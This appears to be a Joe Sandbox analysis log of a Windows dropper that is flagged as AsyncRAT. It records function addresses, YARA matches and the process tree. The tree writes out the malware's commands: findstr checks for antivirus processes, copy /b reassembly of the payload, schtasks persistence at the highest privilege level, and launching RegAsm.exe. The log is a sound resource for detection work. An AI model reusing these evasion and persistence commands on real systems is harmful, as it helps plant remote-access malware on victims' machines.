                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E76A7410_2_00E76A74
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EC0A3A10_2_00EC0A3A
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E50BE010_2_00E50BE0
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E9EDB210_2_00E9EDB2
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6CD5110_2_00E6CD51
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EC0EB710_2_00EC0EB7
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA8E4410_2_00EA8E44
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E76FE610_2_00E76FE6
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E633B710_2_00E633B7
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E5D45D10_2_00E5D45D
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6F40910_2_00E6F409
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E4F6A010_2_00E4F6A0
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E616B410_2_00E616B4
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E4166310_2_00E41663
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E5F62810_2_00E5F628
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E678C310_2_00E678C3
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6DBA510_2_00E6DBA5
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E61BA810_2_00E61BA8
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E79CE510_2_00E79CE5
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E5DD2810_2_00E5DD28
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E61FC010_2_00E61FC0
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6BFD610_2_00E6BFD6
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_002FB02018_2_002FB020
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_002F94E018_2_002F94E0
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_002F9C8018_2_002F9C80
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_003123F518_2_003123F5
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0037840018_2_00378400
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0032650218_2_00326502
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0032265E18_2_0032265E
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_002FE6F018_2_002FE6F0
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031282A18_2_0031282A
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_003289BF18_2_003289BF
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00370A3A18_2_00370A3A
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00326A7418_2_00326A74
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00300BE018_2_00300BE0
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031CD5118_2_0031CD51
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0034EDB218_2_0034EDB2
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00358E4418_2_00358E44
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00370EB718_2_00370EB7
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00326FE618_2_00326FE6
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_002F32C018_2_002F32C0
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_003133B718_2_003133B7
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031F40918_2_0031F409
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0030D45D18_2_0030D45D
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0030F62818_2_0030F628
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_002F166318_2_002F1663
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_003116B418_2_003116B4
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_002FF6A018_2_002FF6A0
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_003178C318_2_003178C3
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031DBA518_2_0031DBA5
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00311BA818_2_00311BA8
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00329CE518_2_00329CE5
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_002F7CC918_2_002F7CC9
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0030DD2818_2_0030DD28
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0031BFD618_2_0031BFD6
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00311FC018_2_00311FC0
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\438799\Dump.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: String function: 00301A36 appears 34 times
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: String function: 00318B30 appears 42 times
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: String function: 00310D17 appears 70 times
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: String function: 00E51A36 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: String function: 00E60D17 appears 70 times
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: String function: 00E68B30 appears 42 times
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: String function: 004062A3 appears 58 times
                Source: DA92phBHUS.exe, 00000000.00000002.1782767831.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs DA92phBHUS.exe
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs DA92phBHUS.exe
                Source: DA92phBHUS.exe, 00000000.00000003.1778251668.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs DA92phBHUS.exe
                Source: DA92phBHUS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@35/13@3/2
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAA6AD GetLastError,FormatMessageW,10_2_00EAA6AD
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E98DE9 AdjustTokenPrivileges,CloseHandle,10_2_00E98DE9
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E99399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00E99399
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00348DE9 AdjustTokenPrivileges,CloseHandle,18_2_00348DE9
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00349399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,18_2_00349399
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00EA4148
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_00EA443D
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifFile created: C:\Users\user\AppData\Local\ImageSyncPro Innovations CoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Kmswbx3MNQibZuVT
                Source: C:\Users\user\Desktop\DA92phBHUS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdFDD7.tmpJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
                Source: DA92phBHUS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\DA92phBHUS.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: DA92phBHUS.exeReversingLabs: Detection: 18%
                Source: C:\Users\user\Desktop\DA92phBHUS.exeFile read: C:\Users\user\Desktop\DA92phBHUS.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DA92phBHUS.exe "C:\Users\user\Desktop\DA92phBHUS.exe"
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif L
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.batJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity LJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif LJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHESTJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"Jump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: mpr.dllJump to behavior
